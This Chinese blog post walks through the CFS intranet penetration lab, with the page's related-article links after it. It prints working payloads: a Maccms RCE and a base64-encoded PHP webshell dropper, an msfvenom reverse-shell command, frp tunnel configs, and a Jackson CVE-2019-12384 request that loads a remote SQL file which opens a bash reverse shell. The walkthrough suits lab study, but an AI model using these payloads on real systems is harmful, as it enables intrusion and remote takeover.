linux内网-cfs2

最新推荐文章于 2024-04-14 16:13:19 发布
最新推荐文章于 2024-04-14 16:13:19 发布
阅读量1.2k 收藏
点赞数
文章标签: linux php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45449318/article/details/122775124
版权

linux内网-cfs2

苹果cms:
在这里插入图片描述

有个rce的洞:

getshell payload(a):
index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}
fput写马,test.php 密码test:
index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW3Rlc3RdKTsgPz4%29%29)}{endif-A}

上线msf,因为我的msf没部署在公网服务器上是部署在本地的mac上的,所以先用frp映射几个端口,frpc.ini:

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 6000

[msf2]
type = tcp
local_ip = 127.0.0.1
local_port = 5555
remote_port = 8000

[msf3]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 9000

[msf4]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 9999

frps.ini:

[common]
bind_addr = 0.0.0.0
bind_port = 7000

msf生成木马:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=121.41.55.60 LPORT=8000 SessionCommunicationTimeout=0 -f elf > w1.elf

开下监听,shell回来了:
在这里插入图片描述
加路由,看下内网,这台主机有两个内网网段:
在这里插入图片描述
收集到的信息:

172.18.16.1:9000 open
172.18.16.1:22 open
172.18.16.1:80 open
172.18.16.1:89 open
[*] WebTitle:http://172.18.16.1        code:200 len:17     title:Welcome to nginx!
[*] WebTitle:http://172.18.16.1:89     code:200 len:9      title:苹果CMS
172.18.25.39:8000 open
172.18.25.85:3306 open
172.18.25.85:80 open
[*] WebTitle:http://172.18.25.85       code:200 len:9      title:苹果CMS
[*] WebTitle:http://172.18.25.39:8000  code:200 len:7      title:Laravel
[+] InfoScan:http://172.18.25.39:8000  [Laravel] 
10.10.6.72:3306 open
10.10.6.82:445 open
10.10.6.82:139 open
10.10.6.72:80 open
10.10.6.52:8080 open
10.10.6.71:9090 open
[*] 10.10.6.82  (Windows 6.1)
[*] WebTitle:http://10.10.6.71:9090    code:404 len:0      title:None
[+] InfoScan:http://10.10.6.71:9090    [SprintBoot] 
[*] WebTitle:http://10.10.6.72         code:200 len:9      title:苹果CMS
[*] WebTitle:http://10.10.6.52:8080    code:404 len:0      title:None
[+] InfoScan:http://10.10.6.52:8080    [SprintBoot]

开sock:
在这里插入图片描述
先看下172的laravel:
在这里插入图片描述
proxifier全局代理打下laravel:
在这里插入图片描述
哥斯拉连接,要3.0版本以下的,因为脚本里写进去的就是3.0以下的payload:
在这里插入图片描述
看下10那个网段再,10.10.6.82 开了smb服务。4.6.3:
在这里插入图片描述

有现成的exp:
在这里插入图片描述
成功拿下:
在这里插入图片描述
sprintboot:http://10.10.6.52:9090 ,Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)。
另外的sprintboot,SpEL 表达式注入漏洞:
在这里插入图片描述

在这里插入图片描述
shell过来了:
在这里插入图片描述
联网的,可以wget上线下,加下路由再信息探测一波:
192.168.13.159开着redis,主从复制rce:

在这里插入图片描述
在这里插入图片描述
还剩最后一个:
在这里插入图片描述
CVE-2019-12384 Jackson 远程代码执行漏洞:

首先在vps上放置一个.sql的文件,内容如下:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {        String[] command = {"bash", "-c", cmd};        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");        return s.hasNext() ? s.next() : "";  }$$;CALL SHELLEXEC('bash -i >& /dev/tcp/xxxxx/7777 0>&1')

然后发送payload,请求远程的sql文件,进行RCE

POST /fuckme HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://xxxxxx/exp.sql'"}]

至此基本打完所有段

qq_45449318
关注
Python爬虫爬取ok资源网电影播放地址
林林木林林L的博客
07-01 3万+
#爬取ok资源网电影播放地址 #www.okzy.co #入口一:http://okzy.co/index.php?m=vod-search&wd={关键字}&submit=search #入口二:http://www.okzy.co/?m=vod-type-id-{1-34}.html # http://www.okzy.co/?m=vod-index-pg-{1-1110}.html # for x in range(1110): # print("http://www
CFS三层靶机——内网渗透流程
最新发布
2301_81177363的博客
05-05 938
靶场由三台服务器构成分别为Target1、Target2、Target3,其系统分别是centos、Ubuntu、Windows7。Target1搭载VMnet2和NAT网卡、Target2搭载VMnet2和VMnet3网卡、Target3仅搭载VMnet3网卡。(确保两两之间能互相通信)
内网渗透-Linux内网渗透
lza20001103的博客
04-14 2475
内网渗透-Linux内网渗透
cfs靶场内网渗透
qq_48511129的博客
01-16 438
靶场wp( 西域大都护府制作的wp) https://mp.weixin.qq.com/s/3QEBMnbByWDSpfrXdJuGPg viper渗透效果
linux系统怎么组内网,纯内网环境下,在Linux环境下操作组件库
weixin_26900991的博客
05-01 487
目录一、简言二、在Linux环境下搭建本地库【第一种方法】2.1、查看Linux系统版本号2.2、上传iso镜像2.2.1、创建上传目录2.2.2、将进行文件上传至/root/tools目录下2.3、挂载文件2.3.1、创建挂载目录2.3.2、挂载2.4、编辑配置文件2.4.1、备份配置文件2.4.2、编辑新增配置文件local.repo2.5、清空yum已存在的源信息三、上传所需要到的组件【第二...
内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 6135
Linux提权姿势汇总
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
3. **CFS三层内网漫游安全测试**:这是一个在CTF比赛中的场景,涉及多层内网和Web攻防。我们首先生成Linux后门,然后通过Metasploit框架接收反弹shell。利用获取的权限,收集网络信息,添加路由,开启Socks4a代理。...
CFS 三层内网漫游安全测试演练
acepanhuan的博客
03-20 579
CFS 三层内网漫游安全测试演练
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1172
cfs三层靶机渗透详细过程
CFS三层内网环境搭建
02-26
/data/cfs-share *(rw,sync,no_subtree_check,no_root_squash) ``` 重启NFS服务使更改生效: ```bash systemctl restart nfs-kernel-server ``` #### 4. 中间层代理配置 中间层负责处理来自应用层请求并将它们...
如何绕过mac地址过滤_Maccms V8 后台Getshell #2(绕过过滤)
weixin_35612315的博客
12-23 641
### 简要描述:现在 V8版本 基本全部文件都有zend加密了。而且还有360_safe3.php保护刚开始以为没搞头的,结果有个妹子发来微信。妹子:在干嘛?我:挖洞妹子:一个人挖?我:对啊!妹子:我过去陪你一起挖吧!我马上关机。擦,想跟老子抢乌云币?果断一个人作死开挖### 详细说明:注意下,这里@农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www...
linux 页描述符 index,【从头开始写操作系统系列】页表以及相关的描述符详解
weixin_42683392的博客
05-25 758
在之前的文章中,我们介绍过 GDT(全局描述符表)以及一致代码段和非一致代码段,这篇文章我们再回到描述符,这次我们来以 ARM 架构为例了解一下页表描述符。在这篇文章中,我们会看到以下内容:页表是什么?一级页表的地址变换过程由一级描述符来获取二级描述符或者段地址的过程页表页表是什么?页表是一种特殊的数据结构,放在系统空间的页表区,存放逻辑页与物理页帧的对应关系。 每一个进程都拥有一个自己的页表,P...
在程序中用#ifdef #endif
a97290137的专栏
12-20 2053
"#ifdef 语句1 程序2 #endif“ 可翻译为:如果宏定义了语句1则程序2。 作用:我们可以用它区隔一些与特定头文件、程序库和其他文件版本有关的代码。 通过使用#ifdef指示符,我们可以区隔一些与特定头文件、程序库和其他文件版本有关的代码。 C语言之详解#ifdef等宏 这几个宏是为了进行条件编译。一般情况下,源程序中所有的行都参加编译。但是有时希望对其中一
libtool: link: warning: library `XXXXX.la' was moved.出现的原因
热门推荐
小菜鸟的天地
03-09 1万+
libtool: link: warning: library `/home/admin/usr/lib/libjson.la' was moved. libtool: link: warning: library `/home/admin/usr/lib/libcares.la' was moved. libtool: link: warning: library `/home/admin/
利用iptables将一台机子的某个端口的流量转发到另外一个机子的某个端口
giantbranch的专栏
01-14 3452
例子:666端口转发到XXXXXXXX:7777端口 iptables -t nat -A PREROUTING -p tcp --dport 666 -j DNAT --to-destination XXXXXXXX:7777 iptables -t nat -A POSTROUTING -j MASQUERADE
代码安全性和健壮性:如何在if和assert中做选择?
IOT物联网小镇
02-27 1116
道哥的第 023 篇原创 文章目录一、前言二、assert 断言assert 是一个宏,不是一个函数三、if VS assert1. 使用 if 语句来检查2. 使用 assert 断言来检查3. 你喜欢哪一个?4. assert 的本质5. if-else 的本质6. 我喜欢的版本五、总结 一、前言 我们在撸代码的时候,经常需要对代码的安全性进行检查,例如: 指针是否为空? 被除数是否为 0? 函数调用的返回结果是否有效? 打开一个文件是否成功? 对这一类的边界条件进行检查的手段,一般都是..
php assert执行命令,代码执行&命令执行&命令注入
weixin_33962315的博客
03-19 2248
代码执行&命令执行&命令注入代码执行代码执行是靠脚本代码调用操作系统的命令evaleval( string $code) : mixed把字符串 code 作为PHP代码执行。eval($_POST['c']);直接蚁剑链接密码为c 中国菜刀 cknifeassertassert( mixedexception]) : bool如果 assertion 是字符串,它将会被 ass...
CFS内网渗透三层内网漫游靶场-2019某CTF案例
weixin_60329395的博客
07-26 2728
CFS三层内网漫游-2019某CTF案例
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值